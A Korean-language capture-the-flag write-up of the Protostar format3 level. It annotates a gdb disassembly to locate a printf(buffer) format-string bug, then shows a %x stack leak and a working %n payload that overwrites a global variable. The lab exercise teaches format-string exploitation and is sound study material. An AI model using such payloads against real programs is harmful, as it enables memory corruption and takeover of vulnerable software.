(gdb) disas vuln
Dump of assembler code for function vuln:
0x08048467 <vuln+0>: push ebp //vuln(): 32-bit x86, cdecl, frame pointer kept; no stack-protector canary load appears in the prologue
0x08048468 <vuln+1>: mov ebp,esp
0x0804846a <vuln+3>: sub esp,0x218 //frame = 0x200-byte buffer at ebp-0x208 plus outgoing-arg slots at [esp], [esp+4], [esp+8]
0x08048470 <vuln+9>: mov eax,ds:0x80496e8 //presumably stdin (third fgets arg) -- confirm with x/wx 0x80496e8
0x08048475 <vuln+14>: mov DWORD PTR [esp+0x8],eax //arg2 = stream
0x08048479 <vuln+18>: mov DWORD PTR [esp+0x4],0x200 //arg1 = 0x200 = size limit
0x08048481 <vuln+26>: lea eax,[ebp-0x208]
0x08048487 <vuln+32>: mov DWORD PTR [esp],eax //arg0 = &buffer (ebp-0x208)
0x0804848a <vuln+35>: call 0x804835c <fgets@plt> //fgets(buffer, 0x200, stdin): length-bounded read, so no stack overflow here; the contents are still user-controlled
0x0804848f <vuln+40>: lea eax,[ebp-0x208]
0x08048495 <vuln+46>: mov DWORD PTR [esp],eax
0x08048498 <vuln+49>: call 0x8048454 <printbuffer> //printbuffer(buffer) -- the arg is the buffer, not stdin; printbuffer passes it to printf as the format string
0x0804849d <vuln+54>: mov eax,ds:0x80496f4 //target (global at 0x80496f4); this function never writes it, only reads it
0x080484a2 <vuln+59>: cmp eax,0x1025544
0x080484a7 <vuln+64>: jne 0x80484b7 <vuln+80> //if(target != 0x1025544){ jmp 80 }
0x080484a9 <vuln+66>: mov DWORD PTR [esp],0x80485a0 //"you have modified the target :)"
0x080484b0 <vuln+73>: call 0x804838c <puts@plt> //puts(msg)
0x080484b5 <vuln+78>: jmp 0x80484ce <vuln+103> //skip the else branch
0x080484b7 <vuln+80>: mov edx,DWORD PTR ds:0x80496f4 //else: reread target
0x080484bd <vuln+86>: mov eax,0x80485c0 //constant format string; judging by the run below presumably "target is %08x :("
0x080484c2 <vuln+91>: mov DWORD PTR [esp+0x4],edx //arg1 = target
0x080484c6 <vuln+95>: mov DWORD PTR [esp],eax //arg0 = fmt
0x080484c9 <vuln+98>: call 0x804837c <printf@plt> //printf(fmt, target): fixed format, so this printf call itself is fine
0x080484ce <vuln+103>: leave
0x080484cf <vuln+104>: ret
End of assembler dump.
(gdb) disas printbuffer
Dump of assembler code for function printbuffer:
0x08048454 <printbuffer+0>: push ebp //printbuffer(char *buffer): 32-bit x86, cdecl
0x08048455 <printbuffer+1>: mov ebp,esp
0x08048457 <printbuffer+3>: sub esp,0x18 //outgoing-arg space only; no locals are used
0x0804845a <printbuffer+6>: mov eax,DWORD PTR [ebp+0x8] //eax = buffer (first cdecl arg, filled by fgets in vuln)
0x0804845d <printbuffer+9>: mov DWORD PTR [esp],eax //arg0 = buffer -- passed as printf's FORMAT, with no further arguments
0x08048460 <printbuffer+12>: call 0x804837c <printf@plt> //printf(buffer): uncontrolled format string (CWE-134); user input is interpreted as conversion directives, which can read and write memory. Fix: printf("%s", buffer) or fputs(buffer, stdout); gcc -Wformat-security flags this call
0x08048465 <printbuffer+17>: leave
0x08048466 <printbuffer+18>: ret
End of assembler dump.
target을 0x1025544로 바꾸면 된다.
user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+"%x_"*12' | ./format3
AAAA0_bffff5e0_b7fd7ff4_0_0_bffff7e8_804849d_bffff5e0_200_b7fd8420_bffff624_41414141_
target is 00000000 :(
입력 버퍼(41414141)는 12번째 인자 위치에 나타난다.
이걸 이제 10진수로 바꿔서 나타내면 16930116인데 이거 넣으면 될듯
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08"+"%16930112d"+"%12$n"'
| ./format3
...중략...
0
you have modified the target :)